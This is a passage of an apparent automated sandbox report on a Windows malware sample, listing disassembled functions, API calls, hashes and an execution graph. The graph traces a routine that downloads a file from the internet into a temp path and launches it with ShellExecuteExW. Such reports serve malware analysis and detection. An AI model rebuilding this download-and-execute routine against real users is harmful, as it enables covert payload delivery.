                                                                                                                                    • Opcode ID: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
                                                                                                                                    • Instruction ID: 656afd6720eca978824560f17fb47cc17b19fb3a621816cfe3730d6e1c8eda21
                                                                                                                                    • Opcode Fuzzy Hash: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
                                                                                                                                    • Instruction Fuzzy Hash: DA017172644650EFE701ABB4ED4ABDA3BA4A725315F10C43AE645A61E3C678440A8B2D
                                                                                                                                    Function 004071F8 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00406ED2: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                                                                                                    • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407239
                                                                                                                                    • lstrcmpW.KERNEL32(?,Version ), ref: 0040724A
                                                                                                                                    • lstrcpynW.KERNEL32(?,?,?), ref: 00407261
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2107068898.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2107048860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107130191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107287418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_hlyG1m5UmO.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: lstrcpyn$CreateFilelstrcmp
                                                                                                                                    • String ID: Version
                                                                                                                                    • API String ID: 512980652-315105994
                                                                                                                                    • Opcode ID: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                                                                                                                    • Instruction ID: 151640cc4cfa07bb85738859349229c9473c158da19ee21f10eacb3052f8d035
                                                                                                                                    • Opcode Fuzzy Hash: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                                                                                                                    • Instruction Fuzzy Hash: 3EF03172A0021CABDB109AA5DD46EEA777CAB44700F100476F600F6191E6B59E158BA5
                                                                                                                                    Function 004032D2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • DestroyWindow.USER32(00000000,00000000,00403703,00000001,?,?,?,00000000,00403A47,?), ref: 004032E5
                                                                                                                                    • GetTickCount.KERNEL32 ref: 00403303
                                                                                                                                    • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                                                                                                    • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A47,?), ref: 0040332E
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2107068898.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2107048860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107130191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107287418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_hlyG1m5UmO.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2102729457-0
                                                                                                                                    • Opcode ID: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                                                                                                                    • Instruction ID: 401e6cecbc7a0b9e3d471fb50fe358663bd3ad25f9a7ebc527197863dd5a4904
                                                                                                                                    • Opcode Fuzzy Hash: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                                                                                                                    • Instruction Fuzzy Hash: 23F08230502620EBC221AF64FE5CBAB7F68FB04B82701447EF545F12A4CB7849928BDC
                                                                                                                                    Function 00406365 Relevance: 6.0, APIs: 4, Instructions: 31memorylibraryloaderCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 00406370
                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 00406386
                                                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 00406395
                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 0040639E
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2107068898.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2107048860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107130191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107287418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_hlyG1m5UmO.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2883127279-0
                                                                                                                                    • Opcode ID: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                                                                                                                    • Instruction ID: 581917a1a4a7218ca9fbbc4554f9bfb31441e22884f00dccc1ee77d568dea7f2
                                                                                                                                    • Opcode Fuzzy Hash: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                                                                                                                    • Instruction Fuzzy Hash: 19E048712012107BE2101B669E8CD677EADDFCA7B6B05013EF695F51A0CE348C15D675
                                                                                                                                    Function 00402797 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25stringCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                                                                                    • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2107068898.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2107048860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107130191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107287418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_hlyG1m5UmO.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: PrivateProfileStringlstrcmp
                                                                                                                                    • String ID: !N~
                                                                                                                                    • API String ID: 623250636-529124213
                                                                                                                                    • Opcode ID: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                                                                                                                    • Instruction ID: 7cd271610f6b1cb64eb4c57d825f56a096f62725fe87e34e9129affe44791136
                                                                                                                                    • Opcode Fuzzy Hash: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                                                                                                                    • Instruction Fuzzy Hash: 37E0E571500208ABDB00BBA0DE85DAE7BBCAF05304F14443AF641F71E3EA7459028718
                                                                                                                                    Function 00405C3F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00405C71
                                                                                                                                    Strings
                                                                                                                                    • Error launching installer, xrefs: 00405C48
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2107068898.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2107048860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107130191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107287418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_hlyG1m5UmO.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseCreateHandleProcess
                                                                                                                                    • String ID: Error launching installer
                                                                                                                                    • API String ID: 3712363035-66219284
                                                                                                                                    • Opcode ID: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                                                                                                                    • Instruction ID: c3c9ba135fb9cbcc5263534f4c07e322ce29f53e9eda4e03cc008bde6a4ec24c
                                                                                                                                    • Opcode Fuzzy Hash: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                                                                                                                    • Instruction Fuzzy Hash: 44E0EC70504209ABEF009B64EE49E7F7BBCEB00305F504575BD51E2561D774D9188A68
                                                                                                                                    Function 004062A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13stringCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                    • wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                      • Part of subcall function 004060E7: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2107068898.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2107048860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107130191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107287418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_hlyG1m5UmO.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseHandlelstrlenwvsprintf
                                                                                                                                    • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                                                                    • API String ID: 3509786178-2769509956
                                                                                                                                    • Opcode ID: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                                                                                                                    • Instruction ID: 8d95e7b1bd6a8fe250904a0927f32055e446839aab417a06e937ad69edd5bb19
                                                                                                                                    • Opcode Fuzzy Hash: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                                                                                                                    • Instruction Fuzzy Hash: 04D05E34150316BACA009BA0DE09E997B64FBD0384F50442EF147C5070FA748001C70E
                                                                                                                                    Function 00405DB6 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                                                                                                    • lstrcmpiA.KERNEL32(?,?), ref: 00405DDE
                                                                                                                                    • CharNextA.USER32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DEF
                                                                                                                                    • lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2107068898.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2107048860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107130191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107287418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_hlyG1m5UmO.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 190613189-0
                                                                                                                                    • Opcode ID: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                                                                                                                    • Instruction ID: 82a91399e33c41d3abe84131f59dcd741317d7299bce3ff9d06b8c6e92496674
                                                                                                                                    • Opcode Fuzzy Hash: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                                                                                                                    • Instruction Fuzzy Hash: D5F0CD31205988EFCB019FA9CD04C9FBBA8EF56350B2180AAE840E7310D630EE01DBA4

                                                                                                                                    Execution Graph

                                                                                                                                    Execution Coverage:0.9%
                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                    Signature Coverage:1.9%
                                                                                                                                    Total number of Nodes:953
                                                                                                                                    Total number of Limit Nodes:24
                                                                                                                                    execution_graph 131131 4347c2 131132 4347cf 131131->131132 131135 4347e7 131131->131135 131188 42fcd5 20 API calls __dosmaperr 131132->131188 131134 4347d4 131189 42b6dd 26 API calls _Deallocate 131134->131189 131137 4347df 131135->131137 131138 434842 131135->131138 131190 4361b1 21 API calls 2 library calls 131135->131190 131151 433dec 131138->131151 131141 43485a 131158 4342fa 131141->131158 131143 434861 131143->131137 131144 433dec __fread_nolock 26 API calls 131143->131144 131145 43488d 131144->131145 131145->131137 131146 433dec __fread_nolock 26 API calls 131145->131146 131147 43489b 131146->131147 131147->131137 131148 433dec __fread_nolock 26 API calls 131147->131148 131149 4348ab 131148->131149 131150 433dec __fread_nolock 26 API calls 131149->131150 131150->131137 131152 433df8 131151->131152 131153 433e0d 131151->131153 131191 42fcd5 20 API calls __dosmaperr 131152->131191 131153->131141 131155 433dfd 131192 42b6dd 26 API calls _Deallocate 131155->131192 131157 433e08 131157->131141 131159 434306 ___DestructExceptionObject 131158->131159 131160 43430e 131159->131160 131162 434326 131159->131162 131259 42fcc2 20 API calls __dosmaperr 131160->131259 131163 4343ec 131162->131163 131168 43435f 131162->131168 131266 42fcc2 20 API calls __dosmaperr 131163->131266 131165 434313 131260 42fcd5 20 API calls __dosmaperr 131165->131260 131166 4343f1 131267 42fcd5 20 API calls __dosmaperr 131166->131267 131170 434383 131168->131170 131171 43436e 131168->131171 131193 43ab84 EnterCriticalSection 131170->131193 131261 42fcc2 20 API calls __dosmaperr 131171->131261 131173 43437b 131268 42b6dd 26 API calls _Deallocate 131173->131268 131175 434389 131178 4343a5 131175->131178 131179 4343ba 131175->131179 131176 434373 131262 42fcd5 20 API calls __dosmaperr 131176->131262 131263 42fcd5 20 API calls __dosmaperr 131178->131263 131194 43440d 131179->131194 131181 43431b __fread_nolock 131181->131143 131184 4343aa 131264 42fcc2 20 API calls __dosmaperr 131184->131264 131185 4343b5 131265 4343e4 LeaveCriticalSection __wsopen_s 131185->131265 131188->131134 131189->131137 131190->131138 131191->131155 131192->131157 131193->131175 131195 434437 131194->131195 131196 43441f 131194->131196 131197 4347a1 131195->131197 131203 43447c 131195->131203 131278 42fcc2 20 API calls __dosmaperr 131196->131278 131302 42fcc2 20 API calls __dosmaperr 131197->131302 131200 434424 131279 42fcd5 20 API calls __dosmaperr 131200->131279 131202 4347a6 131303 42fcd5 20 API calls __dosmaperr 131202->131303 131204 43442c 131203->131204 131206 434487 131203->131206 131212 4344b7 131203->131212 131204->131185 131280 42fcc2 20 API calls __dosmaperr 131206->131280 131207 434494 131304 42b6dd 26 API calls _Deallocate 131207->131304 131209 43448c 131281 42fcd5 20 API calls __dosmaperr 131209->131281 131213 4344d0 131212->131213 131214 434512 131212->131214 131215 4344f6 131212->131215 131213->131215 131248 4344dd 131213->131248 131285 434b8b 21 API calls 3 library calls 131214->131285 131282 42fcc2 20 API calls __dosmaperr 131215->131282 131217 4344fb 131283 42fcd5 20 API calls __dosmaperr 131217->131283 131221 434529 131286 43494e 131221->131286 131222 434502 131284 42b6dd 26 API calls _Deallocate 131222->131284 131223 43467b 131227 4346f1 131223->131227 131230 434694 GetConsoleMode 131223->131230 131225 434532 131228 43494e _free 20 API calls 131225->131228 131229 4346f5 ReadFile 131227->131229 131231 434539 131228->131231 131232 434769 GetLastError 131229->131232 131233 43470f 131229->131233 131230->131227 131234 4346a5 131230->131234 131235 434543 131231->131235 131236 43455e 131231->131236 131237 434776 131232->131237 131238 4346cd 131232->131238 131233->131232 131239 4346e6 131233->131239 131234->131229 131240 4346ab ReadConsoleW 131234->131240 131292 42fcd5 20 API calls __dosmaperr 131235->131292 131294 435cd2 131236->131294 131300 42fcd5 20 API calls __dosmaperr 131237->131300 131257 43450d __fread_nolock 131238->131257 131297 42fc9f 20 API calls 2 library calls 131238->131297 131252 434734 131239->131252 131253 43474b 131239->131253 131239->131257 131240->131239 131245 4346c7 GetLastError 131240->131245 131241 43494e _free 20 API calls 131241->131204 131245->131238 131246 434548 131293 42fcc2 20 API calls __dosmaperr 131246->131293 131247 43477b 131301 42fcc2 20 API calls __dosmaperr 131247->131301 131269 43e931 131248->131269 131298 434129 31 API calls 4 library calls 131252->131298 131254 434762 131253->131254 131253->131257 131299 433f69 29 API calls __wsopen_s 131254->131299 131257->131241 131258 434767 131258->131257 131259->131165 131260->131181 131261->131176 131262->131173 131263->131184 131264->131185 131265->131181 131266->131166 131267->131173 131268->131181 131270 43e94b 131269->131270 131271 43e93e 131269->131271 131275 43e957 131270->131275 131306 42fcd5 20 API calls __dosmaperr 131270->131306 131305 42fcd5 20 API calls __dosmaperr 131271->131305 131274 43e943 131274->131223 131275->131223 131276 43e978 131307 42b6dd 26 API calls _Deallocate 131276->131307 131278->131200 131279->131204 131280->131209 131281->131207 131282->131217 131283->131222 131284->131257 131285->131221 131287 434959 HeapFree 131286->131287 131291 434982 _free 131286->131291 131288 43496e 131287->131288 131287->131291 131308 42fcd5 20 API calls __dosmaperr 131288->131308 131290 434974 GetLastError 131290->131291 131291->131225 131292->131246 131293->131257 131309 435c39 131294->131309 131297->131257 131298->131257 131299->131258 131300->131247 131301->131257 131302->131202 131303->131207 131304->131204 131305->131274 131306->131276 131307->131274 131308->131290 131318 43ae01 131309->131318 131311 435c4b 131312 435c53 131311->131312 131313 435c64 SetFilePointerEx 131311->131313 131331 42fcd5 20 API calls __dosmaperr 131312->131331 131315 435c58 131313->131315 131316 435c7c GetLastError 131313->131316 131315->131248 131332 42fc9f 20 API calls 2 library calls 131316->131332 131319 43ae23 131318->131319 131320 43ae0e 131318->131320 131324 43ae48 131319->131324 131335 42fcc2 20 API calls __dosmaperr 131319->131335 131333 42fcc2 20 API calls __dosmaperr 131320->131333 131323 43ae13 131334 42fcd5 20 API calls __dosmaperr 131323->131334 131324->131311 131325 43ae53 131336 42fcd5 20 API calls __dosmaperr 131325->131336 131327 43ae1b 131327->131311 131329 43ae5b 131337 42b6dd 26 API calls _Deallocate 131329->131337 131331->131315 131332->131315 131333->131323 131334->131327 131335->131325 131336->131329 131337->131327 131338 403262 InternetOpenW 131339 403306 131338->131339 131340 403291 Concurrency::details::ResourceManager::DetermineTopology 131338->131340 131359 410a06 131339->131359 131350 42f109 131340->131350 131343 403315 131345 42f109 std::_Locinfo::_Locinfo_dtor 26 API calls 131346 4032c8 131345->131346 131347 42f109 std::_Locinfo::_Locinfo_dtor 26 API calls 131346->131347 131348 4032da InternetOpenUrlW 131347->131348 131348->131339 131349 4032f5 InternetCloseHandle InternetCloseHandle 131348->131349 131349->131339 131351 42f126 131350->131351 131354 42f118 131350->131354 131366 42fcd5 20 API calls __dosmaperr 131351->131366 131353 42f130 131367 42b6dd 26 API calls _Deallocate 131353->131367 131354->131351 131357 42f156 131354->131357 131356 4032ba 131356->131345 131357->131356 131368 42fcd5 20 API calls __dosmaperr 131357->131368 131360 410a11 IsProcessorFeaturePresent 131359->131360 131361 410a0f 131359->131361 131363 410a84 131360->131363 131361->131343 131369 410a48 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 131363->131369 131365 410b67 131365->131343 131366->131353 131367->131356 131368->131353 131369->131365 131370 4023a3 131371 4023b7 131370->131371 131372 40256a PostQuitMessage 131370->131372 131374 4023be DefWindowProcW 131371->131374 131375 4023d5 131371->131375 131373 402568 131372->131373 131374->131373 131375->131373 131377 402add InternetOpenW 131375->131377 131378 402b10 InternetOpenUrlW 131377->131378 131379 402c85 131377->131379 131378->131379 131380 402b26 GetTempPathW GetTempFileNameW 131378->131380 131382 410a06 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 131379->131382 131393 42b9ce 131380->131393 131384 402c94 131382->131384 131384->131373 131385 402c74 InternetCloseHandle InternetCloseHandle 131385->131379 131386 402b91 Concurrency::details::ResourceManager::DetermineTopology 131387 402ba9 InternetReadFile WriteFile 131386->131387 131388 402be9 CloseHandle 131386->131388 131387->131386 131395 402a49 131388->131395 131391 402c14 ShellExecuteExW 131391->131385 131392 402c5b WaitForSingleObject CloseHandle 131391->131392 131392->131385 131394 402b5f CreateFileW 131393->131394 131394->131385 131394->131386 131396 402a74 _wcslen Concurrency::details::ResourceManager::DetermineTopology 131395->131396 131405 42c660 131396->131405 131400 402aa1 131427 4050bd 131400->131427 131403 410a06 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 131404 402adb 131403->131404 131404->131385 131404->131391 131431 42c312 131405->131431 131408 40290c 131409 40291b Concurrency::details::_CancellationTokenState::_DeregisterCallback 131408->131409 131462 403867 131409->131462 131411 40292f 131476 40481c 131411->131476 131413 402943 131414 402971 131413->131414 131415 402955 131413->131415 131482 4035c3 131414->131482 131503 40377d 166 API calls 131415->131503 131418 40297e 131485 4048b1 131418->131485 131420 402990 131495 404953 131420->131495 131422 4029ad 131424 4050bd 26 API calls 131422->131424 131423 402968 std::ios_base::_Ios_base_dtor Concurrency::details::_CancellationTokenState::_DeregisterCallback 131423->131400 131425 4029cc 131424->131425 131504 40377d 166 API calls 131425->131504 131428 4050c5 131427->131428 131429 402acd 131427->131429 131775 40dd07 26 API calls 2 library calls 131428->131775 131429->131403 131432 42c33f 131431->131432 131433 42c366 131432->131433 131434 42c34e 131432->131434 131445 42c343 131432->131445 131459 42b887 166 API calls 3 library calls 131433->131459 131457 42fcd5 20 API calls __dosmaperr 131434->131457 131437 42c371 131440 42c513 131437->131440 131441 42c37c 131437->131441 131438 410a06 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 131442 402a8d 131438->131442 131439 42c353 131458 42b6dd 26 API calls _Deallocate 131439->131458 131444 42c540 WideCharToMultiByte 131440->131444 131446 42c51e 131440->131446 131447 42c424 WideCharToMultiByte 131441->131447 131449 42c387 131441->131449 131454 42c3c1 WideCharToMultiByte 131441->131454 131442->131408 131444->131446 131445->131438 131446->131445 131461 42fcd5 20 API calls __dosmaperr 131446->131461 131447->131449 131450 42c44f 131447->131450 131449->131445 131460 42fcd5 20 API calls __dosmaperr 131449->131460 131450->131449 131452 42c458 GetLastError 131450->131452 131452->131449 131456 42c467 131452->131456 131454->131449 131455 42c480 WideCharToMultiByte 131455->131446 131455->131456 131456->131445 131456->131446 131456->131455 131457->131439 131458->131445 131459->131437 131460->131445 131461->131445 131463 403873 Concurrency::details::_CancellationTokenState::_DeregisterCallback 131462->131463 131505 40547d 131463->131505 131465 40389f 131509 40571a 131465->131509 131467 4038c8 131515 405316 131467->131515 131469 40391c std::ios_base::_Ios_base_dtor 131471 403958 Concurrency::details::_CancellationTokenState::_DeregisterCallback 131469->131471 131520 40d678 131469->131520 131470 4038d7 131470->131469 131473 405316 26 API calls 131470->131473 131471->131411 131474 4038fd 131473->131474 131519 405c64 166 API calls 7 library calls 131474->131519 131477 404828 Concurrency::details::_CancellationTokenState::_DeregisterCallback 131476->131477 131621 405039 131477->131621 131479 404834 131480 404858 Concurrency::details::_CancellationTokenState::_DeregisterCallback 131479->131480 131625 403afc 131479->131625 131480->131413 131705 4050e0 131482->131705 131484 4035dd Concurrency::details::ResourceManager::DetermineTopology 131484->131418 131486 4048bd Concurrency::details::_CancellationTokenState::_DeregisterCallback 131485->131486 131487 40d678 166 API calls 131486->131487 131488 4048e0 131487->131488 131489 405039 166 API calls 131488->131489 131490 4048ea 131489->131490 131492 40492d Concurrency::details::_CancellationTokenState::_DeregisterCallback 131490->131492 131494 403afc 166 API calls 131490->131494 131491 40490b 131491->131492 131732 40556d 166 API calls 131491->131732 131492->131420 131494->131491 131496 40495f __EH_prolog3_catch 131495->131496 131497 405039 166 API calls 131496->131497 131499 404978 131497->131499 131500 4049a8 131499->131500 131733 403ca0 131499->131733 131737 40556d 166 API calls 131500->131737 131501 404a01 Concurrency::details::_CancellationTokenState::_DeregisterCallback 131501->131422 131503->131423 131504->131423 131506 405489 Concurrency::details::_CancellationTokenState::_DeregisterCallback 131505->131506 131529 405792 131506->131529 131508 4054c1 Concurrency::details::_CancellationTokenState::_DeregisterCallback 131508->131465 131510 405726 Concurrency::details::_CancellationTokenState::_DeregisterCallback 131509->131510 131511 410c43 Concurrency::details::ScheduleGroupSegmentBase::ScheduleTask 22 API calls 131510->131511 131512 405735 131511->131512 131513 40eb98 std::locale::_Init 166 API calls 131512->131513 131514 405743 Concurrency::details::_CancellationTokenState::_DeregisterCallback 131513->131514 131514->131467 131516 405374 131515->131516 131517 40538f 131515->131517 131617 42dcc5 26 API calls 2 library calls 131516->131617 131517->131470 131519->131469 131521 40d6ce 131520->131521 131522 40d68f 131520->131522 131521->131471 131523 40d6c3 131522->131523 131618 40d570 166 API calls 3 library calls 131522->131618 131620 42974d RaiseException 131523->131620 131525 40d6dc 131527 40d6b9 131619 40d41a 28 API calls 3 library calls 131527->131619 131530 40579e Concurrency::details::_CancellationTokenState::_DeregisterCallback 131529->131530 131531 40d678 166 API calls 131530->131531 131532 4057cf 131531->131532 